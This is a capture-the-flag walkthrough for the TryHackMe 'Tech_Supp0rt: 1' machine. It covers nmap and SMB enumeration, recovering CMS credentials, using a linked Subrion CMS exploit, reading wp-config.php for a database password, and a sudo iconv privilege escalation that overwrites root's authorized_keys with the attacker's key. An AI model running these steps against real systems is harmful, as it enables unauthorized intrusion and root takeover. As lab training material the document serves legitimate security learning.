Tech_Supp0rt: 1 (Decoding, SubrionCMS, iconv)
First, we need to enumerate using nmap.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1
╰─➤ nmap -A 10.10.164.236 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-17 21:43 +0630
Nmap scan report for 10.10.164.236
Host is up (0.23s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h50m51s, deviation: 3h10m29s, median: -52s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: techsupport
| NetBIOS computer name: TECHSUPPORT\x00
| Domain name: \x00
| FQDN: techsupport
|_ System time: 2022-04-17T20:43:37+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-04-17T15:13:35
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.62 secondsSSH, HTTP, SSH ports are open. Let's enumerate smb port first.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1
╰─➤ smbclient -L '\\10.10.164.236'
Enter WORKGROUP\hnl's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
websvr Disk
IPC$ IPC IPC Service (TechSupport server (Samba, Ubuntu))
SMB1 disabled -- no workgroup availableWe can see interesting directory called websvr. And access this smb share and download the file that you see in the share.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1
╰─➤ smbclient '\\10.10.164.236\websvr'
Enter WORKGROUP\hnl's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat May 29 13:47:38 2021
.. D 0 Sat May 29 13:33:47 2021
enter.txt N 273 Sat May 29 13:47:38 2021
8460484 blocks of size 1024. 5698824 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exitRead the file. You can see some interesting informations.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1
╰─➤ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->Decode using cyberchef.
Let's change the enumeration to HTTP. When you browse the ip, you will see apache default webpage. Search sub directory using gobuster.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1
╰─➤ gobuster -u http://10.10.164.236/ -w /usr/share/wordlists/directory-list-2.3-medium.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.164.236/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2022/04/17 22:19:00 Starting gobuster
=====================================================
/wordpress (Status: 301)
/test (Status: 301)http://10.10.164.236/wordpress/ point to you wordpress webpage. Every wordpress site contain wp-admin.php. But the credentails admin:Scam2021 (the previous one) didn't work.
http://10.10.164.236/test/ point to you phishing page.
By looking enter.txt, you will see a directory called /subrion. So, we will browse http://10.10.164.236/subrion. But we found nothing. Request using curl.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1
╰─➤ curl -v http://10.10.164.236/subrion
* Trying 10.10.164.236:80...
* TCP_NODELAY set
* Connected to 10.10.164.236 (10.10.164.236) port 80 (#0)
> GET /subrion HTTP/1.1
> Host: 10.10.164.236
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 17 Apr 2022 18:09:59 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Location: http://10.10.164.236/subrion/
< Content-Length: 316
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://10.10.164.236/subrion/">here</a>.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.164.236 Port 80</address>
</body></html>
* Connection #0 to host 10.10.164.236 left intactHow about robots.txt?
Browse to http://10.10.164.236/subrion/panel/ and login using admin:Scam2021. You will find a dashboard.
The webpage is build with Subrion CMS v 4.2.1. Let's find the exploit on google. Here is poc https://www.exploit-db.com/exploits/49876. Download and exploit it.
You can see the wordpress database configuration on /var/www/html/wordpress.
$ cat /var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );
/** MySQL database username */
define( 'DB_USER', 'support' );
/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );Try ssh on scamsite user. You got successful.
Looking around the system, we will see the user run /usr/bin/iconv with root privileges.
scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconvTry to get root shell https://gtfobins.github.io/gtfobins/iconv/. Generate ssh public key on our host and copy to victim's authorized keys.
scamsite@TechSupport:~$ LFILE=/root/.ssh/authorized_keys
scamsite@TechSupport:~$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHmsE/qACwaksUEoBvDE4wFu0/N5eZeNQEX9upOp8Bh4KTZsUcMqo7OSdztZbvkSwwp0S6C3mk9WLioJbQ2dDFC64ZyT/LUAgNZgZkSRZtufQa9lhUgqNYhg/0oT1juH5rGTJhoGa8MROpRhp/LiKXw8g4wOQggrG+xqrnCG84PCcb0bq73XW7XMYN9koLXokwl3GSlX/AkSn3VWgBcnj73IX2eI2yvYSAzckYyWeu9fR6EX/j8Rfj3Z7Tsy0W4iuhHwSGPJHX8yDms9Sx07nQmMGGKW+RmQ6p1dqDt9g/R1L2aXDJLJnZOGzR4ZqdxFpyl3R/R026HXKyeSCSAvaE34GIzBowe6g9K4h/Ewe3zwIBlLW8TGq7L7EBPR2j6d2yYSbniH3GMio88N+vmF4E919gMMlgMqi4fJOhoy/l++4vuBqKAEpGEcywblNLw4YSe59dSBurrFeTNrC3O6CNyO8GyDtQ3wxNOGI7nMe7yOesabNTdz9qDRXdbpyXDwE= hnl@hnl" | sudo /usr/bin/iconv -f 8859_1 -t 8859_1 -o "$LFILE"Try to login using our private key, we got root.
Last updated
Was this helpful?